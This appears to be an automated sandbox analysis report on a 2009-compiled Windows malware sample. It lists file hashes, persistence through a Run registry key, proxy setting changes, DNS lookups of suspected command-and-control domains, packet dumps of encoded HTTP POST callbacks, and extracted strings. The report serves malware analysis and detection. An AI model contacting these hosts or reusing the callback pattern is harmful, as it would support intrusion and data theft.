Analysis Date: 2014-08-22 01:28:37
MD5: 0ad0b7ec4b267aa8e81cde36535ddaa7
SHA1: 9ff37a961d15b7712a560efaf0837e185c5d352c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .idata md5: ba4b0ad064f2bd9372a399a6563f7047 sha1: 15a5604f83163156098d9700bb83b15d609ea0d1 size: 29184
Section: INIT md5: 43273a7b0324056af572222a3b0c2887 sha1: 0979f7334165bb13f90b8d7e0b1414e5132543fc size: 114176
Section: .init md5: da1086b8180b3894a9a8e56e391bbea5 sha1: 5e205e938304a89f354c7b1d6345379fc4f02857 size: 5632
Section: .rdata md5: c55d339a1d97d4c110a45a839e6b4e07 sha1: ba0f9871df0aaffc53dbbdb6efee7e0cb8c7ceef size: 1024
Timestamp: 2009-06-02 07:42:26
PEhash: 4fb93ec042adc200e8642281da61ac6c6f984125
IMPhash: e7e429caf894e8c0ffcfa0914481680f

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F1376AF8-22FB-4ab3-9EB9-0AFF0F492752}
Creates Mutex: {32261348-E850-46f2-80A7-E9D26FE256BE}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\TOY5KNQ8OC ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\TOY5KNQ8OC\Ol2 ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\Tasks\{66BA574B-1E11-49b8-909C-8CC9E0E8E015}.job
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F1376AF8-22FB-4ab3-9EB9-0AFF0F492752}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {32261348-E850-46f2-80A7-E9D26FE256BE}
Winsock DNS: befreenet.com
Winsock DNS: sgfax.com
Winsock DNS: 182.30.149.69
Winsock DNS: maximclock.com
Winsock DNS: urlse.com

Network Details:

DNS: sgfax.com
Type: A
184.168.221.60
DNS: urlse.com
Type: A
54.208.247.222
DNS: setregistration.com
Type: A
208.73.211.163
DNS: setregistration.com
Type: A
208.73.211.174
DNS: setregistration.com
Type: A
208.73.211.175
DNS: setregistration.com
Type: A
208.73.211.193
DNS: setregistration.com
Type: A
208.73.211.242
DNS: maximclock.com
Type: A
DNS: accountunions.com
Type: A
DNS: befreenet.com
Type: A
HTTP POST: http://sgfax.com/resolution.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://urlse.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://182.30.149.69/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 184.168.221.60:80
Flows TCP: 192.168.1.1:1032 ➝ 54.208.247.222:80
Flows TCP: 192.168.1.1:1033 ➝ 182.30.149.69:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 736f6c75 74696f6e   POST /resolution
0x00000010 (00016)   2e706870 20485454 502f312e 310d0a41   .php HTTP/1.1..A
0x00000020 (00032)   63636570 743a202a 2f2a0d0a 436f6e74   ccept: */*..Cont
0x00000030 (00048)   656e742d 54797065 3a206170 706c6963   ent-Type: applic
0x00000040 (00064)   6174696f 6e2f782d 7777772d 666f726d   ation/x-www-form
0x00000050 (00080)   2d75726c 656e636f 6465640d 0a557365   -urlencoded..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e30290d 0a486f73   ows NT 5.0)..Hos
0x000000a0 (00160)   743a2073 67666178 2e636f6d 0d0a436f   t: sgfax.com..Co
0x000000b0 (00176)   6e74656e 742d4c65 6e677468 3a203334   ntent-Length: 34
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a6461 74613d2f 436a4566   he....data=/CjEf
0x00000100 (00256)   5a445376 78714369 4b306c74 554d3175   ZDSvxqCiK0ltUM1u
0x00000110 (00272)   79322f79 75345535 59704e6d 31762f2f   y2/yu4U5YpNm1v//
0x00000120 (00288)   6a546e67 56632b77 4d732b2b 5a426a37   jTngVc+wMs++ZBj7
0x00000130 (00304)   5a535954 72336942 6b472f67 2b375643   ZSYTr3iBkG/g+7VC
0x00000140 (00320)   432f3070 4565324f 48703765 52634850   C/0pEe2OHp7eRcHP
0x00000150 (00336)   69596f39 74774d55 756a6755 57346276   iYo9twMUujgUW4bv
0x00000160 (00352)   5449644e 2f6a5058 7547506a 61427a78   TIdN/jPXuGPjaBzx
0x00000170 (00368)   6c636335 6d704e30 31613674 2f516953   lcc5mpN01a6t/QiS
0x00000180 (00384)   58587770 7a39486d 306b7a39 66426661   XXwpz9Hm0kz9fBfa
0x00000190 (00400)   556e3130 782f474c 636f6652 6948344c   Un10x/GLcofRiH4L
0x000001a0 (00416)   76467341 69475946 7361696f 4d573037   vFsAiGYFsaioMW07
0x000001b0 (00432)   4b304533 726b6b33 4d655a55 79674465   K0E3rkk3MeZUygDe
0x000001c0 (00448)   4c477732 7331322b 6f504d4e 726e4a5a   LGw2s12+oPMNrnJZ
0x000001d0 (00464)   637a687a 5a387869 4e577535 54674f68   czhzZ8xiNWu5TgOh
0x000001e0 (00480)   71344f71 55533042 4d54644b 32625a79   q4OqUS0BMTdK2bZy
0x000001f0 (00496)   2f687833 546e6d47 7954464c 48684c63   /hx3TnmGyTFLHhLc
0x00000200 (00512)   52662b76 417a494f 424e6d76 34334344   Rf+vAzIOBNmv43CD
0x00000210 (00528)   4b325130 35415663 6d413832 4b685466   K2Q05AVcmA82KhTf
0x00000220 (00544)   5573732f 476f6c77 686c6d39 6b4c6775   Uss/Golwhlm9kLgu
0x00000230 (00560)   326c4936 7055366e 3336642f 6e346b6f   2lI6pU6n36d/n4ko
0x00000240 (00576)   6c567861 36516e2f 413d3d              lVxa6Qn/A==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   75726c73 652e636f 6d0d0a43 6f6e7465   urlse.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   70456532 4f487037 65526348 5069596f   pEe2OHp7eRcHPiYo
0x00000150 (00336)   3974774d 55756a67 55573462 76544964   9twMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c67 75326c49   /Golwxlm9kLgu2lI
0x00000230 (00560)   36705536 6e333664 2f6e346b 6f6c5678   6pU6n36d/n4kolVx
0x00000240 (00576)   6136516e 2f413d3d 413d3d              a6Qn/A==A==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   3138322e 33302e31 34392e36 390d0a43   182.30.149.69..C
0x000000b0 (00176)   6f6e7465 6e742d4c 656e6774 683a2033   ontent-Length: 3
0x000000c0 (00192)   34310d0a 436f6e6e 65637469 6f6e3a20   41..Connection: 
0x000000d0 (00208)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x000000e0 (00224)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000f0 (00240)   6368650d 0a0d0a64 6174613d 2f436a45   che....data=/CjE
0x00000100 (00256)   665a4453 76787143 694b306c 74554d31   fZDSvxqCiK0ltUM1
0x00000110 (00272)   7579322f 79753455 3559704e 6d31762f   uy2/yu4U5YpNm1v/
0x00000120 (00288)   2f6a546e 6756632b 774d732b 2b5a426a   /jTngVc+wMs++ZBj
0x00000130 (00304)   375a5359 54723369 426b472f 672b3756   7ZSYTr3iBkG/g+7V
0x00000140 (00320)   43432f30 70456532 4f487037 65526348   CC/0pEe2OHp7eRcH
0x00000150 (00336)   5069596f 3974774d 55756a67 55573462   PiYo9twMUujgUW4b
0x00000160 (00352)   76544964 4e2f6a50 58754750 6a61427a   vTIdN/jPXuGPjaBz
0x00000170 (00368)   786c6363 356d704e 30316136 742f5169   xlcc5mpN01a6t/Qi
0x00000180 (00384)   53585877 707a3948 6d306b7a 39664266   SXXwpz9Hm0kz9fBf
0x00000190 (00400)   61556e31 30782f47 4c636f66 52694834   aUn10x/GLcofRiH4
0x000001a0 (00416)   4c764673 41694759 46736169 6f4d5730   LvFsAiGYFsaioMW0
0x000001b0 (00432)   374b3045 33726b6b 334d655a 55796744   7K0E3rkk3MeZUygD
0x000001c0 (00448)   654c4777 32733132 2b6f504d 4e726e4a   eLGw2s12+oPMNrnJ
0x000001d0 (00464)   5a637a68 7a5a3878 694e5775 3554674f   ZczhzZ8xiNWu5TgO
0x000001e0 (00480)   6871344f 71555330 424d5464 4b32625a   hq4OqUS0BMTdK2bZ
0x000001f0 (00496)   792f6878 33546e6d 47795446 4c48684c   y/hx3TnmGyTFLHhL
0x00000200 (00512)   6352662b 76417a49 4f424e6d 76343343   cRf+vAzIOBNmv43C
0x00000210 (00528)   444b3251 30354156 636d4138 324b6854   DK2Q05AVcmA82KhT
0x00000220 (00544)   66557373 2f476f6c 77786c6d 396b4c67   fUss/Golwxlm9kLg
0x00000230 (00560)   75326c49 36705536 6e333664 2f6e346b   u2lI6pU6n36d/n4k
0x00000240 (00576)   6f6c5678 6136516e 2f413d3d            olVxa6Qn/A==


Strings
Z
.
n..M
.
...
4
W .
.

jshu
tW7n
*|&,:!
01.8T^
0<(57z
05PQbF?
05=Q<Y
0\c0l~
0gFjX~
0=m&4e|
0Q1=T 
,/0~_S
#119N_
18d6|.
1.~9-)0
1(f,go
^, 1=;g?
1|GJ[{Qi#
.*1gm1
(1T?K3
1*=:x=<$
1ZaFuW
_*1zu<:
 2;0"^
2:0Lw;
2#:+3c$
}2);9_
2dLcGD
2.i-rI
?.+2lV
#2Oxvy
^ 2t5Yo
=2$'tn
(2+&z:
\#~3~^
32;;lc
3b6J<&gO~
;3?*dN
-3Gm9MN
3gVwIReX5
3T:o<c
;45JZ7i+
=(\4=6;
^/4o?K2 7
4#tJZ?<dl
,',4u>9G
&5?(,0
59^tsJIo
5@)*=fL
.5?nm$R
5\ xyP"
^+5&,y
6bEPLwz5ezhr5
6f$.UPvy
6mizcIm
6nG0N5
/7*(:?
7m#I$1
7?MR:"
7n9hoFpuj
7(OV^N
89GsLrkP
\{8Fj9'
8)L6s%1
8(t7BA	>
8#,z09
8:ZpT~m
9	76Dgn
97r^Mf;H
-.98yv
9 h:)<~
#\9%(/K
9MJh21
9'*PN3
9uo4nZ
9v0]t@
("9^vj
9.Vo27D"=
9xFt5V
a4OI~r
*A6- ?F0
_acmdln
_ADAu 
ADVAPI32.dll
aDV?v=
a`~ME~
%&a^O_ 
ASkI95
av#F9xg
aXil~O
|{"azW~
:?]%b1
b1MZVR
b=<9hn
Bbu5EU
BeginPaint
bF5Z1zL
bgj7LH
buJ6WW
`^+]=C	
~|}C0q
C>19&l
c2P0C;v
	C#^6<
calloc
CallWindowProcA
C!B.?|:CZ
C<FlK%?
CharLowerA
CharNextA
!+cL&[
~CN=01
CoGetContextToken
comdlg32.dll
CoUnmarshalInterface
CreateIcon
CreateMenu
	D|0gzE
D. %1NL=
d:.#43
<d8gI"
D9=J8?
-DC<.v
DeferWindowPos
DeleteCriticalSection
dh=Jc]
DispatchMessageA
d,LX#0
DN%V^fp?B
DragQueryFileA
DrawEdge
DrawMenuBar
dzv8ce
e3f;c8
e.}8ixF
e/9<:I
eB)	9b
EB{.CQ4
eCw=+1{52
EnableMenuItem
EndDeferWindowPos
EnumCalendarInfoA
EnumChildWindows
EnumThreadWindows
EnumWindows
ePBFBp
ExitProcess
E[X]ST
EYq-=%1
E=ZJxn
-F	41N
F"GVEO@D)2
FindFirstFileA
FindWindowA
FJa`^~
fn^&,?
FreeResource
F~(Vr6
F%x4>H
}F.x-S
g=<7~c
)'g9F%!|E
gA#[qjf]
GDI32.dll
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentThread
GetCurrentThreadId
GetCursor
GetDesktopWindow
GetDIBColorTable
GetDiskFreeSpaceA
GetFileTitleA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetFullPathNameA
GetIconInfo
GetKeyState
GetMenuItemCount
GetMenuStringA
GetProcAddress
GetPropA
GetSaveFileNameA
GetScrollRange
GetSysColor
GetVersionExA
gH4=+r V
;\gj"-
[Gl='bWs"
gLo:\*
GlobalDeleteAtom
gMO*2L
#G&T;"!g
g.Trh1
gtuA~A
<H~0ihz
h4DC6=YN
hDU0pR
HeapFree
HF#1x9
HF.8L[
~.,Hg|
$hkr@	
H:Kt#U
hsl@6z
?HU1_Ykx
hW8JK_R
H;z;-`
\hz_+;0-
I!29U(
i476W`
I54L36
i9n"Pp
iacXr9h
.idata
I]Md(J
@.init
InitializeCriticalSection
~I;r^N
;!^IVN?~94F5
<|j4Nn~
jC20]+nP
J(f?p9
jGfkKc
J"ievB0t/
JMl7iNNf
jn#-`,
-jO7L;
j$)t"0
=&K(%$
$&-=K,
k3Z5N*g
+=K8i:
K,8rLgm
KA?C.S
kernel32.dll
kgm~i+
kmj3GVm
K@_W8zqm
|KXJOP
kx-"`Z
l;5L)*Y=
l69c=1}>N
/l,B:^9aZ
L=h~}m
>l':iv 
;Lj;?8b
lK_P.wMi
LoadLibraryExA
LoadResource
lRx6PtjF
lstrcmpiA
lstrlenA
?Lvr~*
lV&?)Y/
lW]VzfT
^LzbkW
M[0B2u
M7;&2`.\
M8OoNF
m9WWH1
mAbGjA
malloc
mbstowcs
memcpy
memmove
MessageBoxA
MkParseDisplayName
mNZ7 (
MoveFileExA
mQW/.Q
m[s1>Jkn
MSVCRT.dll
m\,T#?a
(!MUj@?\
MUzcsRW
=m*z<;
!mZk2}
&n{6r?
N<8?y[J}
Na0_WJM9
NCY!|My
njT:>mi
NJWQP~
NomQgXl3
/NQWF/
N@%?yYz
:O5e<B
o;69p"
O:,C1sfb,
O<fh:3z
oJjfa^
O~Kw9SQ
OLE32.dll
'[Ov0N
?~(o|{wn
":<O^y
Pakb@W
PathFileExistsA
PathIsContentTypeA
PathIsDirectoryA
PbYzZI:
|{Pdf0
p);h9`
PHF2;hK?
"-!P=%J6
P~#MJZ
P*mvr:i
p^)~Ov7
@pQWLh
PWfzM]
PWLhQWM
PW:`QW$
PW!>QW
}Px=>j
PxkJ9W
P'XTE5
]Q	_A 
qfk9$T.
qi="7~R{
QLrHQ>
QpK3u6
,QRS9f
+ q_?v
)QW@lnW
qyFhbC9
r5fJoxR
<\R90mh
RaiseException
Ra>|Wf
.rdata
RegCreateKeyA
RegEnumKeyA
RegEnumValueA
RegOpenKeyExA
~r`j(,
>R*lhk
ro] #n~
+~ roZ
rR[=j+.m
rtQky40
r.u"{lp
r}wz>xWL=Y
;?.rxn
r*Y/F=
	S?:$<?
S8)Qt@;
s96LGQ@
SetBkColor
SetCursor
SetEvent
SetHandleCount
SetTimer
SetWindowPos
-sHCb=
SHDeleteKeyA
SHDeleteValueA
shell32.dll
SHEnumValueA
SHGetDesktopFolder
SHGetFileInfoA
SHGetFolderPathA
SHGetValueA
shlwapi.dll
SHLWAPI.dll
SHLWAPI.DLL
SHQueryInfoKeyA
SHQueryValueExA
SHStrDupA
SizeofResource
SP0LR!.
_S#]"PC
s/Q!|v
s+~V9#F
SystemParametersInfoA
<SZRP6
t5tR7vV
<T9KY)
}@Ta	R
 tDKy>z
Tg?+.Qv/
*Tgu^9
!This program cannot be run in DOS mode.
#<Tn>?
tolower
&t?P1|
<U'-1`
?u2m"gv
u9JBHn~
uE!=W0KdM
=Uhot~
|Umi>&f
umUL=&,
uqCBks05
{U+.rX
user32.dll
USER32.dll
#=+V2i*4
.&,v8K 
)V?990'
v_9fm7-T
?V^B.w
vc!0CT
VerFindFileA
VerInstallFileA
VerQueryValueA
version.dll
VERSION.dll
VirtualAlloc
VirtualAllocEx
VirtualQuery
[vlRnr
vo"}>.
}V_*R 
VR!?x6
V=wZNv
^*:/=w
W/2QW9
W9EQW,
WB2.9e
?wbEVU[Z
wcsncmp
W=FBNC0(
WideCharToMultiByte
W,=lo"
WriteFile
,W#u<&(
_wZim.b
X0dfrc^
X0M^){o
}%X1K~
=X<:7O
XUQ=99*
y6n0mh
Y8=7.0&
y|.m&N1
{./Yrz0K6
YS.*9\]9V:
~>Yv1A
,z></c
?}z%\Ck6
^znbRBj
|^ ,zy